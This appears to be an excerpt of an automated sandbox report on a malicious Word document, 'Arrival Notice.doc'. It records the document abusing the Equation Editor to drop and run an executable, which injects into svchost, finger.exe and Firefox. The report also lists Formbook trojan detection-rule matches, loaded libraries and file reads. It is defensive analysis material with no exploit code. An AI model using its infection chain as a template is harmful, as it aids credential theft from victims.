Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0088DF5C appears 137 times
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: String function: 012CF9F2 appears 40 times
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: String function: 012B9CB3 appears 31 times
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: String function: 012D0A30 appears 46 times

Source: sqlite3.dll.8.dr

Static PE information: Number of sections : 18 > 10

Source: C:\Windows\SysWOW64\finger.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: Arrival Notice.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 6.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@11/19@16/15

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_013237B5 GetLastError,FormatMessageW,

5_2_013237B5

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_013110BF AdjustTokenPrivileges,CloseHandle,		5_2_013110BF
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_013116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		5_2_013116C3

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_013251CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

5_2_013251CD

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0133A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

5_2_0133A67C

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0132648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

5_2_0132648E

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012B42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

5_2_012B42A2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$rival Notice.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5E93.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: finger.exe, 00000008.00000002.842417592.0000000061E92000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: finger.exe, 00000008.00000002.842417592.0000000061E92000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: finger.exe, 00000008.00000002.842417592.0000000061E92000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: finger.exe, 00000008.00000002.842417592.0000000061E92000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: finger.exe, 00000008.00000002.842417592.0000000061E92000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: finger.exe, 00000008.00000002.842417592.0000000061E92000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: finger.exe, 00000008.00000002.842417592.0000000061E92000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: finger.exe, 00000008.00000002.842417592.0000000061E92000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: finger.exe, 00000008.00000002.842417592.0000000061E92000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: Arrival Notice.doc	Virustotal: Detection: 41%
Source: Arrival Notice.doc	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\fredchungel99962.exe "C:\Users\user\AppData\Roaming\fredchungel99962.exe"
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\fredchungel99962.exe"
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Windows\SysWOW64\finger.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\fredchungel99962.exe "C:\Users\user\AppData\Roaming\fredchungel99962.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\fredchungel99962.exe"	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Arrival Notice.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Arrival Notice.doc

Source: C:\Windows\SysWOW64\finger.exe

File opened: C:\Windows\SysWOW64\RichEd32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: finger.pdb source: svchost.exe, 00000006.00000002.382575658.00000000002C4000.00000004.00000020.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000002.841270185.00000000002F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000002.841357951.00000000009FE000.00000002.00000001.01000000.00000005.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841874386.00000000009FE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdb source: fredchungel99962.exe, 00000005.00000003.347165757.0000000001140000.00000004.00001000.00020000.00000000.sdmp, fredchungel99962.exe, 00000005.00000003.347607847.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.382638779.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.382638779.0000000000870000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.357269124.0000000000580000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.357579627.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.380970803.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000002.841503603.0000000002170000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000008.00000003.382999741.0000000001E60000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000002.841503603.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\browser\app\firefox.pdb source: finger.exe, 00000008.00000003.439245227.0000000005C30000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.457692397.0000000000F20000.00000040.80000000.00040000.00000000.sdmp
